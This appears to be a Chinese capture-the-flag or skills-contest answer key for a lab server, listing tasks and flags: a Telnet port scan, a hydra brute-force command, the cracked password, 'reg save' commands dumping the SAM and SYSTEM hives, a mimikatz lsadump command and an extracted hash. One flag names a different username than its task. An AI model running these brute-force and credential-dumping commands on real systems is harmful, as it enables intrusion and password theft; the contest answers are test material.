需要环境私
1.通过本地 PC 中渗透测试平台 Kali 对服务器场景进行系统服务及版本扫描渗透测试,并将该操作显示结果中 Telnet 服务对应的端口号作为FLAG提交;
flag:23
2.通过本地 PC 中渗透测试平台 Kali 对服务器场景进行渗透测试,使用kali中 hydra 对服务器 Telnet 服务进行暴力破解(用户名为teltest),将hydra使用的必要参数当做 FLAG 进行提交(例:nmap -s -p 22);(字典路径/usr/share/wordlists/dirb/small.txt)
flag:hydra -l administrator -P /usr/share/wordlists/dirb/small.txt
3.通过本地 PC 中渗透测试平台 Kali 对服务器场景进行渗透测试,使用kali中 hydra 对服务器 Telnet 服务进行暴力破解(用户名为teltest),将破解成功的密码当做 FLAG 进行提交;(字典路径/usr/share/wordlists/dirb/small.txt)
flag:123
4.通过本地 PC 中渗透测试平台 win7 对服务器场景进行渗透测试,取得的账户密码有远程桌面权限,将该场景系统中 sam 文件使用reg 相关命令提取,将完整命令作为 FLAG 提交;
靶机开启3389远程连接服务通过上面爆破出来的密码进行连接
flag: reg save HKLM\SAM sam.hive
5.通过本地 PC 中渗透测试平台 win7 对服务器场景进行渗透测试,取得的账户密码有远程桌面权限,将该场景系统中 system 文件使用reg 相关命令提取,将完整命令作为 FLAG 提交;
flag:reg save HKLM\SYSTEM system.hive
6.通过本地 PC 中渗透测试平台 win7 对服务器场景进行渗透测试,将sam文件与 system 文件提取到本地,使用桌面 mimikatz 工具提取teltest密码信息,将提取信息的命令作为 FLAG 提交;
桌面有个mimikatz文件夹右键里面使用管理员权限打开
flag:lsadump::sam /sam:C:\sam.hive /system:C:\system.hive
7.通过本地 PC 中渗透测试平台 win7 对服务器场景进行渗透测试,将sam文件与 system 文件提取到本地,使用桌面 mimikatz 工具提取administrators密码信息,将提取到的 hash 值作为 FLAG 提交;
flag:3dbde697d71690a769204beb12283678
版权归原作者 Strelizia_XX 所有, 如有侵权,请联系我们删除。